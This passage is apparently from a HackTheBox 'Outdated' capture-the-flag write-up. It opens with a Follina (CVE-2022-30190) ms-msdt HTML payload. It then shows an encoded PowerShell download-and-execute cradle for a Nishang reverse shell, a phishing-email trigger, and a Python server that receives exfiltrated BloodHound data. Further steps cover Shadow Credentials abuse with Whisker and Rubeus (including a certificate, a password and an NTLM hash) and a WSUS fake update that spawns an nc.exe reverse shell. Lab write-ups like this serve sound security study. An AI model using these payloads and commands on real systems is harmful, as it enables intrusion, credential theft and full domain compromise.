//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/SYstem32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>
</body>
</html>
The only thing I need to modify is the last line in the javscript script tag, and specifically I need to replace Start-Process(‘calc’) with my malicious reverse shell code (Every thing else needs to stay the same otherwise the exploit will not work).
However, I also need to avoid using space character because it will break the payload, so one way to get this working is by using Invoke-Expression powershell command and Base64 encoding, making the payload such as the following:
Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8vMTAuMTAuMTYuNy9JbnZva2UtUG93ZXJTaGVsbFRjcC5wczEiKQ=='+[char]34+'))')))
Where the decoded Base64 payload is:
Encoded: SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8vMTAuMTAuMTYuNy9JbnZva2UtUG93ZXJTaGVsbFRjcC5wczEiKQ==
Decoded: IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.7/Invoke-PowerShellTcp.ps1")
It uses IEX expression which will download a malicious powershell script hosted on my server and execute it directly without writing to disk.
This malicious script is Invoke-PowerShellTcp.ps1 from Nishang Project, however I appendeded this line at the end to trigger the reverse connection:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.7 -Port 1234
Getting Reverse Shell
Trigger the exploit with:
sendemail -f most@xeon.com -t itsupport@outdated.htb -u "Click on link" -m "http://10.10.16.7/exploit.html" -s 10.10.11.175:25
- You can ignore the error in powershell, it will not affect the reverse shell.
Finding Possible Privilege Escalation
Dumping Domain Information Using BloodHound
Now, I will try to collect Active Directory information using SharpHound.ps1 and then analyse them using BloodHound:
IEX(New-Object Net.WebClient).DownloadString("http://10.10.16.3:8000/SharpHound.ps1")
Invoke-BloodHound -CollectionMethod All -Domain outdated.htb
To transfer the file to my kali machine, I’ll use Invoke-RestMethod powershell command to send a post request containing the zip file to a python3 server under my control that will save it to disk:
Python3 server script:
#!/usr/bin/env python3
"""
Very simple HTTP server in python for logging to catch post request containing a file and write its content to disk
Usage::
./server.py [<port>]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging
class S(BaseHTTPRequestHandler):
def _set_response(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self._set_response()
self.wfile.write("No Get".encode('utf-8'))
def do_POST(self):
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
with open(str(self.path.split("/")[-1]), 'wb') as f:
f.write(post_data)
logging.info("Content written to %s", str(self.path))
self._set_response()
self.wfile.write("POST request for {}".format(self.path).encode('utf-8'))
def run(server_class=HTTPServer, handler_class=S, port=8080):
logging.basicConfig(level=logging.INFO)
server_address = ('', port)
httpd = server_class(server_address, handler_class)
logging.info('Starting httpd...\n')
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
logging.info('Stopping httpd...\n')
if __name__ == '__main__':
from sys import argv
if len(argv) == 2:
run(port=int(argv[1]))
else:
run()
Invoke-RestMethod -Uri "http://10.10.16.3:8080/20221214212009_BloodHound.zip" -Method Post -InFile "20221214212009_BloodHound.zip" -UseDefaultCredentials
Importing data in BloodHound:
Finding AddKeyCredentialLink For User SFLOWERS
Since I got command execution as btables user, I’ll mark it as owned and try to find the Shortest Path From Owned Principals:
Looks like btables user is a member of ITSTAFF group that has AddKeyCredentialLink on sflowers user. This means that btables has the ability to write to the msds-KeyCredentialLink property on SFLOWERS@OUTDATED.HTB, allowing him to create Shadow Credentials on the object (sflowers user) and authenticate as the principal using kerberos PKINIT.
- msds-KeyCredentialLink (aka. “kcl”): attribute can be used to link an RSA key pair with a computer or user object in order to authenticate with said key pair against the KDC to receive a Kerberos TGT. So the kcl is in fact a set of alternate credentials that works alongside username/password.
Escalating To SFLOWERS Using Whisker
I’ll use Whisker which is a tool that will help me achieve this attack.
Compiling Whisker
Whisker does not come pre-compiled, which means that I need to have a windows machine to compile it, so I’ll use Windows Commando VM.
I can either use Visual Studio IDE or Dotnet command from the command line to compile the binary, but in either ways I need to install Visual Studio Installer in addition to its build tools.
After installing Visual Studio Installer, these are the required tools to download:
Now I can compile the binary using the following commands:
git clone https://github.com/eladshamir/Whisker.git
cd Whisker
"C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\MSBuild\15.0\Bin\MSBuild.exe" /t:Clean /t:Build /p:Configuration=Release /p:DebugSymbols=false /p:DebugType=None /p:TrimUnusedDependencies=true Whisker.sln
- If you’re using Visual Studio 2022 the steps should be the same execpt for the path of MSBuild.exe which will be different depending where the newer version stores it.
Executing Whisker
Uploading Whisker to the target machine:
Executing Whisker:
.\Whisker.exe add /target:sflowers
This will give me a new command to run using Rubeus, so I need to upload this tool to the target machine as well:
However, since I am using Invoke-PowerShellTcp.ps1, the amount of characters I can use to run a command are limited, which means that simply copy pasting this long command will not work in my case. So what I’ll do is to copy it into a powershell file and then execute it from there:
$ cat whisker_command.ps1
.\Rubeus.exe asktgt /user:sflowers /certificate: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 /password:"ovojsJ9blcegavO1" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
Running the script:
.\whisker_command.ps1
Gaining Access As SFLOWERS And Reading User Flag
Now that I have a Ticket Granting Ticket and the NTLM hash for the user sflowers, I can either use impacket-psexec (with the -k flag to use the TGT), or Evil-WinRM (with the hash) to access the machine and read the user flag.
In my case I’ll use Evil-WinRM:
evil-winrm -i outdated.htb --hash 1FCDB1F6015DCB318CC77BB2BDA14DB5 -u sflowers
Now, I’ll use WinPEAS to look for possible vulnerabilities or misconfigurations allowing me to escalate to Administrator:
Searching For Possible Ways To Escalate To System
Executing WinPEAS:
.\winPEASx64.exe
Finding WSUS Misconfiguration
It found that the server might be vulnerable to WSUS attack
-
WSUS: know as Windows Server Update Services, helps distribute updates, fixes, and other types of releases available from Microsoft Update using one or more WSUS servers which will centralize the job and give the administrators the control over which update to release to the clients, instead of having each machine go on the internet to download the update from there.
-
WSUS Attack: the attack takes advantage of the fact that the updates are requested using HTTP instead of HTTPS protocol, allowing the attackers to inject fake malicious updates into non-SSL WSUS traffic and gain control over the machine.
Checking the registry keys manually:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
Exploiting WSUS Using SharpWSUS
I’ve tried to use many tools but for some reason only SharpWSUS and Wsuspendu worked for me.
- Wsuspendu’s repo has been deleted now, but it was demonstrated in this blackhat paper, so here I’ll perform the attack using SharpWSUS.
Compiling SharpWSUS
First, I need to compile it from my Windows Commando VM and copy it to kali, so I’ll open a cmd and issue the following command:
git clone https://github.com/nettitude/SharpWSUS.git
cd SharpWSUS
"C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\MSBuild\15.0\Bin\MSBuild.exe" /t:Clean /t:Build /p:Configuration=Release /p:DebugSymbols=false /p:DebugType=None /p:TrimUnusedDependencies=true SharpWSUS.sln
Creating Fake Update And Waiting For Reverse Shell
I also need to transfer PsExec.exe binary signed by microsoft. PsExec.exe is the binary that will allow me to run any command because WSUS doesn’t run any binary unless it’s signed to microsoft and the binaries inside PSTools are signed.
This is how the tool works:
- First, I need to create the update and append my malicious command, in this case I’ll use Netcat (nc.exe) to get a reverse shell:
.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\PsExec.exe" /args:" -accepteula -s -d C:\\Users\\sflowers\\Documents\\nc.exe -e cmd.exe 10.10.16.24 8989" /title:"Xeon Update" - Next, I need to approve the update (I need to use /groupname flag or it will not work):
.\SharpWSUS.exe approve /updateid:137147af-1494-4067-94cf-9da1aeca5d41 /computername:dc.outdated.htb /groupname:"Xeons Group" - Finally, I can check for the update if it’s installed or not using:
.\SharpWSUS.exe check /updateid:137147af-1494-4067-94cf-9da1aeca5d41 /computername:dc.outdated.htb
Uploading nc.exe to target:
Creating the update:
Approving the update:
Checking the update (not installed yet):
Waiting for a while before checking the update again (installed):
Getting System Shell And Reading Root Flag
Getting nt authority\system shell and reading root.txt flag:
HackTheBox Windows Active-Directory Smbclient SMTP Sendemail Phishing CVE-2022-30190 Invoke-PowerShellTcp BloodHound SharpHound.ps1 Invoke-RestMethod-Transfer-Files Shadow-Credentials Whisker Rubeus Evil-WinRM WinPEAS WSUS-Attack SharpWSUS
2738 Words
2022-12-08 21:57